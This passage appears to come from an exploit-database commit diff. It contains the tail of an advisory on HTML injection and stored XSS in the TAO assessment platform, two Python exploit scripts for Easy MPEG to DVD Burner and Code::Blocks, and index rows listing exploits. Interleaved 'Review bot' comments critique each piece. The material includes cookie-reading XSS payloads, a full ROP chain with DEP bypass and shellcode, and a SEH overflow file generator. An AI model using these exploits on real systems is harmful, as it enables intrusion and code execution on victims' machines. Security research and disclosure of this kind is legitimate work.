&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userLastName=<img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png">
|
||||||
|
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userMail=<img
|
||||||
|
src="https://www.evolution-sec.com/evosec-logo.png">&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userUILg=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langca&
|
||||||
|
http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userRoles_9=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_DeliveryRole&
|
||||||
|
classUri=http_2_www_0_tao_0_lu_1_Ontologies_1_TAOSubject_0_rdf_3_Subject&uri=http_2_localhost_1_tao_0_rdf_3_i1586957152301539
|
||||||
|
&password2=<img src="https://www.evolution-sec.com/evosec-logo.png">
|
||||||
|
&password3=<img src="https://www.evolution-sec.com/evosec-logo.png">
|
||||||
|
-
|
||||||
|
POST: HTTP/1.1 200 OK
|
||||||
|
Server: Apache/2.4.38 (Win32) PHP/7.2.15
|
||||||
|
X-Powered-By: PHP/7.2.15
|
||||||
|
Set-Cookie: tao_0855799=a4dd4f04e0f27648dcd6ee3e966cdb380d511079; path=/
|
||||||
|
Keep-Alive: timeout=5, max=100
|
||||||
|
Connection: Keep-Alive
|
||||||
|
Transfer-Encoding: chunked
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
|
||||||
|
|
||||||
|
Reference(s):
|
||||||
|
http://localhost:89/tao/Users/edit
|
||||||
|
http://localhost:89/tao/Main/index
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The persistent cross site scripting web vulnerability can be exploited
|
||||||
|
by remote attackers with privileged user account with low user interaction.
|
||||||
|
For security demonstration or to reproduce the cross site scripting web
|
||||||
|
vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Open and login to the tao application
|
||||||
|
2. Move into the test module on top
|
||||||
|
3. Add new Rubric Block
|
||||||
|
4. Inject script code test payload into the text label content input field
|
||||||
|
5. Save the entry and move on the right site to activate
|
||||||
|
6. The click on activate includes and executes the content immediatly
|
||||||
|
7. Succesful reproduce of the cross site scripting vulnerability!
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Vulnerable Source
|
||||||
|
<div class="rubricblock-content"><div>asd>"><span
|
||||||
|
data-serial="img_l9lmylhuv8hf55xo9z264n"
|
||||||
|
class="widget-box widget-inline widget-img" data-qti-class="img"
|
||||||
|
contenteditable="false">
|
||||||
|
<img data-serial="img_l9lmylhuv8hf55xo9z264n" data-qti-class="img"
|
||||||
|
src="" alt="" style=""
|
||||||
|
width="100%"></span> <img data-serial="img_rxephz0lwthtejgsndo2f3"
|
||||||
|
data-qti-class="img" src="evil.source" alt="" style="">
|
||||||
|
>"<script>alert(document.cookie)></script></div></iframe></div></div>
|
||||||
|
</li></ol>
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Payload
|
||||||
|
"<script>alert(document.cookie)></script>
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Session Logs [POST] ---
|
||||||
|
http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612
|
||||||
|
Host: localhost:89
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
|
||||||
|
Gecko/20100101 Firefox/75.0
|
||||||
|
Accept: application/json, text/javascript, */*; q=0.01
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 9664
|
||||||
|
Origin: http://localhost:89
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer:
|
||||||
|
http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring
|
||||||
|
Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
|
||||||
|
tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
|
||||||
|
model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI
|
||||||
|
Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[],
|
||||||
|
"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[],
|
||||||
|
"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false,
|
||||||
|
"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
|
||||||
|
1","visible":true,
|
||||||
|
"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[],
|
||||||
|
"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
|
||||||
|
"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,
|
||||||
|
"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[],
|
||||||
|
"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses":
|
||||||
|
false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
|
||||||
|
1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true,
|
||||||
|
"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef",
|
||||||
|
"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},
|
||||||
|
{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[],
|
||||||
|
"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl
|
||||||
|
":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories"
|
||||||
|
:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[],
|
||||||
|
"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":
|
||||||
|
"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6",
|
||||||
|
"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
|
||||||
|
"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
|
||||||
|
"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
|
||||||
|
"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"<script>alert(document.cookie)></script>",
|
||||||
|
"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"},
|
||||||
|
"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No
|
||||||
|
outcome processing.
|
||||||
|
Erase the existing rules, if
|
||||||
|
any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}}
|
||||||
|
-
|
||||||
|
POST: HTTP/1.1 200 OK
|
||||||
|
Server: Apache/2.4.38 (Win32) PHP/7.2.15
|
||||||
|
X-Powered-By: PHP/7.2.15
|
||||||
|
Cache-Control: no-store, no-cache, must-revalidate
|
||||||
|
Pragma: no-cache
|
||||||
|
Content-Security-Policy: frame-ancestors 'self'
|
||||||
|
Content-Length: 14
|
||||||
|
Keep-Alive: timeout=5, max=100
|
||||||
|
Connection: Keep-Alive
|
||||||
|
Content-Type: application/json; charset=UTF-8
|
||||||
|
-
|
||||||
|
http://localhost:89/tao/Main/evil.source
|
||||||
|
Host: localhost:89
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
|
||||||
|
Gecko/20100101 Firefox/75.0
|
||||||
|
Accept: image/webp,*/*
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer:
|
||||||
|
http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring
|
||||||
|
Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
|
||||||
|
tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
|
||||||
|
-
|
||||||
|
GET: HTTP/1.1 200 OK
|
||||||
|
Server: Apache/2.4.38 (Win32) PHP/7.2.15
|
||||||
|
X-Powered-By: PHP/7.2.15
|
||||||
|
Cache-Control: no-store, no-cache, must-revalidate
|
||||||
|
Pragma: no-cache
|
||||||
|
Content-Length: 169
|
||||||
|
Keep-Alive: timeout=5, max=99
|
||||||
|
Connection: Keep-Alive
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
1.1
|
||||||
|
The security risk of the html inject web vulnerability in the
|
||||||
|
web-application is estimated as medium.
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The security risk of the persistent cross site scripting web
|
||||||
|
vulnerability in the web-application is estimated as medium.
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability-Lab -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||||
|
Benjamin Kunz Mejri -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without
|
||||||
|
any warranty. Vulnerability Lab disclaims all warranties,
|
||||||
|
either expressed or implied, including the warranties of merchantability
|
||||||
|
and capability for a particular purpose. Vulnerability-Lab
|
||||||
|
or its suppliers are not liable in any case of damage, including direct,
|
||||||
|
indirect, incidental, consequential loss of business profits
|
||||||
|
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||||
|
advised of the possibility of such damages. Some states do
|
||||||
|
not allow the exclusion or limitation of liability for consequential or
|
||||||
|
incidental damages so the foregoing limitation may not apply.
|
||||||
|
We do not approve or encourage anybody to break any licenses, policies,
|
||||||
|
deface websites, hack into databases or trade with stolen data.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||||
|
www.vulnerability-db.com
|
||||||
|
Services: magazine.vulnerability-lab.com
|
||||||
|
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||||
|
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||||
|
youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php
|
||||||
|
vulnerability-lab.com/rss/rss_upcoming.php
|
||||||
|
vulnerability-lab.com/rss/rss_news.php
|
||||||
|
Programs: vulnerability-lab.com/submit.php
|
||||||
|
vulnerability-lab.com/register.php
|
||||||
|
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this
|
||||||
|
file requires authorization from Vulnerability Laboratory.
|
||||||
|
Permission to electronically redistribute this alert in its unmodified
|
||||||
|
form is granted. All other rights, including the use of other
|
||||||
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||||
|
All pictures, texts, advisories, source code, videos and other
|
||||||
|
information on this website is trademark of vulnerability-lab team & the
|
||||||
|
specific authors or managers. To record, list, modify, use or
|
||||||
|
edit our material contact (admin@ or research@) to get a ask permission.
|
||||||
|
|
||||||
|
Copyright © 2020 | Vulnerability Laboratory - [Evolution
|
||||||
|
Security GmbH]™
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY - RESEARCH TEAM
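Review bot: the 1.2 cross site scripting claim is not backed by the session log as written. The payload `"<script>alert(document.cookie)></script>` carries a stray `>` after `alert(document.cookie)`, so the script body is a JavaScript syntax error and would not run even though the vulnerable source shows it reaching the page unencoded; the only execution the log captures is the browser fetching the injected image (`GET http://localhost:89/tao/Main/evil.source`), which demonstrates unencoded HTML in the rubric block rather than script execution, so 1.2 is supported only as HTML injection unless script execution is actually shown. The logged `model=` body is also not replayable as printed: the `content` value embeds unescaped double quotes, and `"itemSessionControl"{"qtitype":` is missing a colon and a hyphen. In the header block, "Exploitation Technique: Remote" and the "remote attackers" wording in 1.1 sit beside "Restricted authentication (user/moderator)" and a PoC that needs Manage Users access, so the abstract should state the required privilege; the timeline lists only the public disclosure date with no vendor notification or fix, and a short mitigation line (HTML output encoding of `userFirstName`, `userLastName`, `userMail` and the rubric `content` value where they are rendered in the users table and rubric block) would make the advisory actionable. Typos: "immediatly", "Succesful", "vulnerabilities has been" (have).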

150
exploits/windows/local/48339.py
Executable file
@ -0,0 +1,150 @@
# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)
# Date: 2020-04-15
# Exploit Author: Bailey Belisario
# Tested On: Windows 7 Ultimate x64
# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe
# Version: 1.7.11
# Exploit Length: 1015 Bytes
# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode)

# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow
# Exploit used with Python2.7
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characters: \x00\x0a\x0d #
# SEH Offset: 1012 #
# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe #
#------------------------------------------------------------------------------------------------------------------------------------#

# Register setup for VirtualProtect() (Bypass DEP) :
#---------------------------------------------------
# EAX = Points to PUSHAD at time VirtualProtect() is called
# ECX = lpflOldProtect (0x10047d30 as writable location)
# EDX = flNewProtect(0x40)
# EBX = dwSize (0x92)
# ESP = lpAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualProtect()
# EDI = ROP NOP (RETN)

import struct

def create_rop_chain():

    rop_gadgets = [

        # Put 1 in EDX and decrement to 0
        0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
        0x1003629a, # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN
        0x11111111, # Filler

        # Pop the pointer of VirtualProtect into EAX
        0x10037b12, # POP EAX # RETN
        0x1003b268, # ptr to &VirtualProtect() [IAT SkinMagic.dll]

        # Dereference Pointer into EDX then move back to EAX
        0x1001c011, # ADD EDX,DWORD PTR [EAX] # RETN 0x0C
        0x10031772, # MOV EAX,EDX # RETN
        0x11111111, # Filler
        0x11111111, # Filler
        0x11111111, # Filler

        # Push VP and pop into EBP
        0x1002e17b, # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C
        0x10037b12, # POP EAX # RETN
        0x11111111, # Filler
        0x11111111, # Filler
        0x11111111, # Filler

        # Use this to get to address needed to Pop VP into ESI
        0x1003619e, # POP EAX # POP ESI # RETN

        # Move VP to +12 on stack then push the POP POP RETN
        0x10032485, # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN
        0x11111111, # Filler popped
        0x11111111, # Filler popped

        # Set ESI to VP
        0x1002e1ce, # POP ESI # RETN [SkinMagic.dll]
        0x11111111, # Where VP is MOV into

        # Set EBP with POP EBP RETN
        0x1002894f, # POP EBP # RETN [SkinMagic.dll]
        0x1002894f, # skip 4 bytes [SkinMagic.dll]

        # Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F)
        # Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40
        0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
        0x10037b12, # POP EAX # RETN
        0x1005a0a0, # Address of 3F
        0x10026173, # ADD EDX,DWORD PTR [EAX] # RETN

        # Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers
        # Note: This should be at least length of shellcode
        0x100362c6, # XOR EAX,EAX # RETN
        0x10033fb2, # ADD AL,0C9 # RETN
        0x10033fb2, # ADD AL,0C9 # RETN
        0x10035c12, # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN

        # Set ECX to writable location
        0x1003603f, # POP ECX # RETN [SkinMagic.dll]
        0x10047d30, # &Writable location [SkinMagic.dll]

        # Set EDI to ROP NOP
        0x100395c2, # POP EDI # RETN [SkinMagic.dll]
        0x10032982, # RETN (ROP NOP) [SkinMagic.dll]

        # Do PUSHAD and be 1337
        0x10037654, # POP EAX # RETN
        0xa140acd2, # CONSTANT
        0x100317c8, # ADD EAX,5EFFC883 # RETN
        0x1003248d, # PUSH EAX # RETN

        # Used to jump to ESP
        0x1001cc57, # ptr to 'push esp # ret ' [SkinMagic.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

ropChain = create_rop_chain()

# CALC.EXE for POC
shell = ("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
         "\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F"
         "\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
         "\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45"
         "\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7")

# 148 Bytes needed to return to ROP CHAIN
paddingBeginning = "B"*148

# NOP Sled needs to be sufficient length, from some math, I came out with a buffer of 444 - len(ROP CHAIN)
nopLen = 444 - len(ropChain)
nopSled = '\x90'*nopLen

# Padding to SEH needs to consider the 420 bytes remaining - shellcode
paddingMiddleLen = 420 - len(shell)
paddingMiddle = 'B'*paddingMiddleLen

# 0x004043ee (add esp, 7D4) Stack Pivot 2004 bytes
# This brings total bytes to SEH Offset (1012) + 3 for a total of 1015 bytes
seh = "\xee\x43\x40"

# Exploit Visualization #
#------------------------#
# BBBBBBBBBBBBBBBBBBBB #
#------------------------#
# ROP CHAIN #
#------------------------#
# NOPS #
#------------------------#
# SHELL CODE #
#------------------------#
# BBBBBBBBBBBBBBBBBBBB #
#------------------------#
# SEH #
#------------------------#

exploit = paddingBeginning + ropChain + nopSled + shell + paddingMiddle + seh

file = open("pwn.txt", 'w')
file.write(exploit)
file.close()
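Review bot: the comment `# Set EBX to 0x92` and the `EBX = dwSize (0x92)` line in the register table do not match what the gadgets compute: `XOR EAX,EAX` then `ADD AL,0C9` twice leaves AL = 0x92 with the carry flag set, and `ADC BL,AL` adds that carry, so EBX ends at 0x93 when it starts at 0. Harmless for dwSize, since the note only requires it to cover the shellcode, but both comments should say 0x93 or explain the carry. Two gadgets also depend on the crash-time value of ECX, which is not set until the `# Set ECX to writable location` step: `CMP EAX,DWORD PTR [ECX+8]` reads through ECX, and `OR CL,CL # JNE ...` only falls through to RETN when CL is zero, so a comment stating that assumption would make the chain easier to verify. Minor: the script is Python 2 only (`''.join(struct.pack(...))` returns bytes under Python 3 and the `"\x..."` literals are str), which the header states only in a comment, and `file` shadows the Python 2 builtin.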

31
exploits/windows/local/48344.py
Executable file
@ -0,0 +1,31 @@
# Exploit Title: Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE
# Date: 2020-04-17
# Exploit Author: T3jv1l
# Software Link: https://sourceforge.net/projects/codeblocks/files/Binaries/16.01/Windows/codeblocks-16.01-setup.exe
# Software version: 16.01


buffer="A"*536 #buffer
buffer+="\x61\x41" #POPAD + Aligned
buffer+="\xF2\x41" #POP/POP/RET

#----------------------Align the eax to point to the shellcode PART -----------------------
#buffer+="\x90" #NOP
#buffer+="\x6e" #venetian padding
#buffer+="\x05\x37\x13" #add eax, 0x13003700
#buffer+="\x6e"
#buffer+="\x2d\x36\x13" #sub eax, 0x13003600
#buffer+="\x6e" #venetian padding
#buffer+="\x50" #push eax
#buffer+="\x6e" #Venetian padding
#buffer+="\xc3" #ret

#----------------------Shellcode PlaceHOLDER ----------------------------------------------
#uffer+="\x90"*111
#buffer+=("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")
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x90"*(5000-len(buffer))
f=open('exploit.m3u','w');
f.write(buffer);
f.close();
print "[+] File created."
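Review bot: as committed the file demonstrates SEH overwrite control only, not code execution, and the header should say so. The Venetian alignment block and the shellcode placeholder are both commented out, so what follows the POP/POP/RET address is four `\xcc` int3 bytes and NOP padding up to 5000 bytes, while the title reads like a working exploit. The header is also missing a 'Tested on' line and any reproduction step: the output file is `exploit.m3u`, and nothing explains how an .m3u file is handed to Code::Blocks. Minor: `#uffer+="\x90"*111` is a typo in a commented line, the trailing semicolons on the three file calls are unneeded, and `print "..."` is Python 2 syntax with no interpreter version noted.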

@ -11030,6 +11030,8 @@ id,file,description,date,author,type,platform,port
48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
48344,exploits/windows/local/48344.py,"Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE",2020-04-17,T3jv1l,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
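Review bot: the date in the new 48339 row (2020-04-17) disagrees with the `# Date: 2020-04-15` header of exploits/windows/local/48339.py added in this same commit; one of the two should be corrected. The new 48344 row (2020-04-17) matches its file header, and both rows leave the port column empty like the neighbouring local entries.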
|
||||||
|
@ -18100,6 +18102,7 @@ id,file,description,date,author,type,platform,port
|
||||||
48335,exploits/php/remote/48335.rb,"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)",2020-04-16,Metasploit,remote,php,
|
48335,exploits/php/remote/48335.rb,"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)",2020-04-16,Metasploit,remote,php,
|
||||||
48336,exploits/windows/remote/48336.rb,"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,windows,
48336,exploits/windows/remote/48336.rb,"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,windows,
48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple,
48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple,
48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
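Review bot: the 48343 description abbreviates to "RCE" while every neighbouring Metasploit row in this hunk spells it out ("Code Execution" in 48335, "Remote Code Execution" in 48336 and 48338); suggest "Nexus Repository Manager - Java EL Injection Remote Code Execution (Metasploit)" so searches on the full phrase match all four rows. Also confirm the platform column: 48338, another Metasploit module in the same context block, is filed under multiple rather than a single OS, so check that linux rather than multiple is intended for 48343.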
@ -42578,3 +42581,6 @@ id,file,description,date,author,type,platform,port
48326,exploits/php/webapps/48326.txt,"DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting",2020-04-15,"Vulnerability Research Laboratory",webapps,php,
48326,exploits/php/webapps/48326.txt,"DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting",2020-04-15,"Vulnerability Research Laboratory",webapps,php,
48327,exploits/ios/webapps/48327.txt,"File Transfer iFamily 2.1 - Directory Traversal",2020-04-15,Vulnerability-Lab,webapps,ios,
48327,exploits/ios/webapps/48327.txt,"File Transfer iFamily 2.1 - Directory Traversal",2020-04-15,Vulnerability-Lab,webapps,ios,
48328,exploits/php/webapps/48328.txt,"Xeroneit Library Management System 3.0 - 'category' SQL Injection",2020-04-15,"Sohel Yousef",webapps,php,
48328,exploits/php/webapps/48328.txt,"Xeroneit Library Management System 3.0 - 'category' SQL Injection",2020-04-15,"Sohel Yousef",webapps,php,
48340,exploits/ios/webapps/48340.txt,"Playable 9.18 iOS - Persistent Cross-Site Scripting",2020-04-17,Vulnerability-Lab,webapps,ios,
48341,exploits/php/webapps/48341.txt,"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection",2020-04-17,Vulnerability-Lab,webapps,php,
48342,exploits/hardware/webapps/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",webapps,hardware,
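Review bot: the 48342 description is inconsistently capitalised, "Denial of service (PoC)", whereas the other rows in this hunk title-case every word of the vulnerability class ("Persistent Cross-Site Scripting", "Directory Traversal", "HTML Injection", "SQL Injection"); change it to "Denial of Service (PoC)". The three added rows keep ascending id order (48340, 48341, 48342) and the empty port column used by the 48326 to 48328 context rows, so nothing else to flag.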